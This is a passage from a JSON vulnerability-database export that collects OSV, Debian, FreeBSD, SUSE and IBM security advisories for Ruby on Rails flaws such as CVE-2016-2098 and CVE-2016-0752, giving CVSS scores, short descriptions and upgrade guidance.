"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-10-24T18:33:36", "type": "osv", "title": "actionpack is vulnerable to remote bypass authentication", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2023-03-28T05:38:55", "id": "OSV:GHSA-P692-7MM3-3FXG", "href": "https://osv.dev/vulnerability/GHSA-p692-7mm3-3fxg", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-28T05:37:16", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "actionpack allows remote code execution via application's unrestricted use of render method", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2023-03-28T05:37:15", "id": "OSV:GHSA-78RC-8C29-P45G", "href": "https://osv.dev/vulnerability/GHSA-78rc-8c29-p45g", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:19:23", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the MIME type cache, which allows remote attackers to cause a denial of service (memory consumption) via a crafted HTTP Accept header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "actionpack is vulnerable to denial of service via a crafted HTTP Accept header", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2023-03-28T05:19:19", "id": "OSV:GHSA-FFPV-C4HM-3X6V", "href": "https://osv.dev/vulnerability/GHSA-ffpv-c4hm-3x6v", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-28T05:44:31", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "Directory traversal vulnerability in Action View in Ruby on Rails", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2023-03-28T05:44:28", "id": "OSV:GHSA-XRR4-P6FQ-HJG7", "href": "https://osv.dev/vulnerability/GHSA-xrr4-p6fq-hjg7", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-05T05:19:45", "description": "\nThe support and utility classes used by the Rails 3.2 framework allow\nremote attackers to cause a denial of service (SystemStackError) via a\nlarge XML document depth.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n3.2.6-6+deb7u2.\n\n\nAdditionally this upload adds 'active\\_support/security\\_utils' that will\nbe used by ruby-actionpack-3.2 to address [CVE-2015-7576](https://security-tracker.debian.org/tracker/CVE-2015-7576).\n\n\nWe recommend that you upgrade your ruby-activesupport-3.2 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.7, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-08-27T00:00:00", "type": "osv", "title": "ruby-activesupport-3.2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3227", "CVE-2015-7576"], "modified": "2022-08-05T05:19:42", "id": "OSV:DLA-603-1", "href": "https://osv.dev/vulnerability/DLA-603-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nRuby on Rails blog:\n\nRails 4.2.5.2, 4.1.14.2, and 3.2.22.2 have been released! These\n\t contain the following important security fixes, and it is\n\t\trecommended that users upgrade as soon as possible.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-02-29T00:00:00", "type": "freebsd", "title": "rails -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-02-29T00:00:00", "id": "5A016DD0-8AA8-490E-A596-55F4CC17E4EF", "href": "https://vuxml.freebsd.org/freebsd/5a016dd0-8aa8-490e-a596-55f4cc17e4ef.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nRuby on Rails blog:\n\nRails 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, and 3.2.22.1 have been\n\t released! These contain important security fixes, and it is\n\t recommended that users upgrade as soon as possible.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-01-25T00:00:00", "type": "freebsd", "title": "rails -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2016-01-25T00:00:00", "id": "BB0EF21D-0E1B-461B-BC3D-9CBA39948888", "href": "https://vuxml.freebsd.org/freebsd/bb0ef21d-0e1b-461b-bc3d-9cba39948888.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nRuby Security team reports:\n\nThere is a possible XSS vulnerability in Action View. Text declared as \"HTML\nsafe\" will not have quotes escaped when used as attribute values in tag\nhelpers. This vulnerability has been assigned the CVE identifier\nCVE-2016-6316.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-11T00:00:00", "type": "freebsd", "title": "Rails 4 -- Possible XSS Vulnerability in Action View", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-11T00:00:00", "id": "43F1C867-654A-11E6-8286-00248C0C745D", "href": "https://vuxml.freebsd.org/freebsd/43f1c867-654a-11e6-8286-00248c0c745d.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "suse": [{"lastseen": "2016-09-04T11:59:55", "description": "This update for rubygem-actionpack-3_2 fixes the following issues:\n\n - CVE-2016-2097: rubygem-actionview: Possible Information Leak\n Vulnerability in Action View. (boo#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (boo#968849)\n\n", "cvss3": {}, "published": "2016-03-19T16:13:08", "type": "suse", "title": "Security update for rubygem-actionpack-3_2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-2097"], "modified": "2016-03-19T16:13:08", "id": "OPENSUSE-SU-2016:0835-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00080.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:21:19", "description": "This update for rubygem-actionview-4_1 fixes the following issues:\n\n - CVE-2016-2097: rubygem-actionview: Possible Information Leak\n Vulnerability in Action View. (bsc#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (bsc#968849)\n\n", "cvss3": {}, "published": "2016-03-22T18:08:06", "type": "suse", "title": "Security update for rubygem-actionview-4_1 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-2097"], "modified": "2016-03-22T18:08:06", "id": "SUSE-SU-2016:0854-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00083.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:39:50", "description": "This update for rubygem-actionpack-3_2 fixes the following issues:\n\n - CVE-2016-2097: rubygem-actionview: Possible Information Leak\n Vulnerability in Action View. (bsc#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (bsc#968849)\n\n", "cvss3": {}, "published": "2016-04-07T13:08:19", "type": "suse", "title": "Security update for rubygem-actionpack-3_2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-2097"], "modified": "2016-04-07T13:08:19", "id": "SUSE-SU-2016:0967-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00006.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:02:22", "description": "Portus was updated to version 2.0.3, which brings several fixes and\n enhancements:\n\n - Fixed crono job when a repository could not be found.\n - Fixed compatibility issues with Docker 1.10 and Distribution 2.3.\n - Handle multiple scopes in token requests.\n - Add optional fields to token response.\n - Fixed notification events for Distribution v2.3.\n - Paginate through the catalog properly.\n - Do not remove all the repositories if fetching one fails.\n - Fixed SMTP setup.\n - Don't let crono overflow the 'log' column on the DB.\n - Show the actual LDAP error on invalid login.\n - Fixed the location of crono logs.\n - Always use relative paths.\n - Set RUBYLIB when using portusctl.\n - Don't count hidden teams on the admin panel.\n - Warn developers on unsupported docker-compose versions.\n - Directly invalidate LDAP logins without name and password.\n - Don't show the "I forgot my password" link on LDAP.\n\n The following Rubygems bundled within Portus have been updated to fix\n security issues:\n\n - CVE-2016-2098: rubygem-actionpack (bsc#969943).\n - CVE-2015-7578: rails-html-sanitizer (bsc#963326).\n - CVE-2015-7579: rails-html-sanitizer (bsc#963327).\n - CVE-2015-7580: rails-html-sanitizer (bsc#963328).\n - CVE-2015-7576: rubygem-actionpack, rubygem-activesupport (bsc#963563).\n - CVE-2015-7577: rubygem-activerecord (bsc#963604).\n - CVE-2016-0751: rugygem-actionpack (bsc#963627).\n - CVE-2016-0752: rubygem-actionpack, rubygem-actionview (bsc#963608).\n - CVE-2016-0753: rubygem-activemodel, rubygem-activesupport,\n rubygem-activerecord (bsc#963617).\n - CVE-2015-7581: rubygem-actionpack (bsc#963625).\n\n", "cvss3": {}, "published": "2016-04-25T20:07:56", "type": "suse", "title": "Security update for portus (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-7577", "CVE-2015-7580", "CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-2098", "CVE-2016-0753", "CVE-2016-0752", "CVE-2015-7579", "CVE-2015-7578"], "modified": "2016-04-25T20:07:56", "id": "SUSE-SU-2016:1146-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00053.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:43:04", "description": "This update for rubygem-actionview-4_2 fixes the following issues:\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (boo#968849)\n\n", "cvss3": {}, "published": "2016-03-16T19:12:46", "type": "suse", "title": "Security update for rubygem-actionview-4_2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-16T19:12:46", "id": "OPENSUSE-SU-2016:0790-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00057.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:22:34", "description": "This update for rubygem-actionview-4_2 fixes the following issues:\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (bsc#968849)\n\n", "cvss3": {}, "published": "2016-03-23T19:08:52", "type": "suse", "title": "Security update for rubygem-actionview-4_2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-23T19:08:52", "id": "SUSE-SU-2016:0867-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00086.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ibm": [{"lastseen": "2023-02-21T01:36:38", "description": "## Summary\n\nVulnerabilities discovered in Ruby on Rails component affect IBM License Metric Tool v9 and IBM BigFix Inventory v9.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-2098_](<https://vulners.com/cve/CVE-2016-2098>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to execute arbitrary code on the system, caused by improper validation of user-supplied input by the render method. By sending specially-crafted data, an attacker could exploit this vulnerability to execute arbitrary ruby code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111173_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111173>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n**CVEID:** [_CVE-2016-2097_](<https://vulners.com/cve/CVE-2016-2097>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to obtain sensitive information, caused by improper validation of user-supplied input by the render method. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to view files located outside of the target application's view directory. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111174_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111174>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM License Metric Tool v9 \n\nIBM BigFix Inventory v9\n\n## Remediation/Fixes\n\nUpgrade to version v9.2.4.0. \n\nUse the following procedure:\n\n * In IBM Endpoint Manager console, expand **IBM BigFix Inventory **or** IBM License Reporting (ILMT)** node under **Sites** node in the tree panel.\n * Click **Fixlets and Tasks** node. **Fixlets and Tasks** panel will be displayed on the right.\n * In the **Fixlets and Tasks** panel locate _Upgrade to the newest version of IBM BigFix Inventory 9.x _or _Upgrade to the newest version IBM License Metric Tool 9.x_ fixlet and run it against the computer that hosts your server.\n \nNote: In an airgapped environment, you have to run BESAirgapTool and BESDownloadCacher first in order to update your site. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2022-08-19T21:04:31", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Ruby on Rails affect IBM License Metric Tool v9 and IBM BigFix Inventory v9 (CVE-2016-2098 CVE-2016-2097)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2022-08-19T21:04:31", "id": "F4CB340412A2CB363B4E3389C6065B45CE9BC3FFC09E2D04AB7B774F53DE8A3A", "href": "https://www.ibm.com/support/pages/node/281239", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:37:43", "description": "## Summary\n\nVulnerabilities discovered in Ruby on Rails component affect IBM License Metric Tool v9, IBM BigFix Inventory v9 and IBM Endpoint Manager for Software Use Analysis v9 & v2.2.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7576_](<https://vulners.com/cve/CVE-2015-7576>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to obtain sensitive information, caused by a timing attack in the basic authentication support in Action Controller. An attacker could exploit this vulnerability to obtain the username and password. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110099_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110099>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID:** [_CVE-2015-7577_](<https://vulners.com/cve/CVE-2015-7577>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to bypass security restrictions, caused by the improper handling of updates in combination with destroy flags when destroying records isdisabled by the nested attributes feature in Active Record. An attacker could exploit this vulnerability to set attributes to invalid values. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110100_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110100>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID:** [_CVE-2015-7581_](<https://vulners.com/cve/CVE-2015-7581>)** \nDESCRIPTION:** Ruby on Rails is vulnerable to a denial of service, caused by an object leak vulnerability for wildcard controllers in Action Pack. An attacker could exploit this vulnerability to consume all available memory resources. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110104_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110104>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**CVEID:** [_CVE-2016-0751_](<https://vulners.com/cve/CVE-2016-0751>)** \nDESCRIPTION:** Ruby on Rails is vulnerable to a denial of service, caused by an object leak in Action Pack. By sending a specially crafted accept header, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110105_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110105>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**CVEID:** [_CVE-2016-0752_](<https://vulners.com/cve/CVE-2016-0752>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to obtain sensitive information, caused by an error in Action View. By sending a specially crafted request, an attacker could exploit this vulnerability to view portions of files on the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110106_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110106>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID:** [_CVE-2016-0753_](<https://vulners.com/cve/CVE-2016-0753>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to bypass security restrictions, caused by input validation in Active Model. By sending specially crafted data, an attacker could exploit this vulnerability to bypass security restrictions. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110107_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110107>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n\n## Affected Products and Versions\n\nIBM License Metric Tool v9 \nIBM BigFix Inventory v9 \nIBM Endpoint Manager for Software Use Analysis v9 & v2.2\n\n## Remediation/Fixes\n\nFor v9, upgrade to version v9.2.4.0. \n\nUse the following procedure:\n\n * In IBM Endpoint Manager console, expand **IBM BigFix Inventory **or** IBM License Reporting (ILMT)** node under **Sites** node in the tree panel.\n * Click **Fixlets and Tasks** node. **Fixlets and Tasks** panel will be displayed on the right.\n * In the **Fixlets and Tasks** panel locate _Upgrade to the newest version of IBM BigFix Inventory 9.x _or _Upgrade to the newest version IBM License Metric Tool 9.x_ fixlet and run it against the computer that hosts your server.\n \nNote: In an airgapped environment, you have to run BESAirgapTool and BESDownloadCacher first in order to update your site. \n\nFor v2.2, upgrade to IBM BigFix Inventory 9.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-26T21:17:25", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Ruby on Rails affect IBM License Metric Tool v9, IBM BigFix Inventory v9 and IBM Endpoint Manager for Software Use Analysis v9 & v2.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2021-04-26T21:17:25", "id": "E7183AB173010AD555253E1C8255AC6DD7B1D2F6B9E8F805A55734163D6C20F2", "href": "https://www.ibm.com/support/pages/node/281879", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "hackerone": [{"lastseen": "2023-02-03T01:51:29", "bounty": 1500.0, 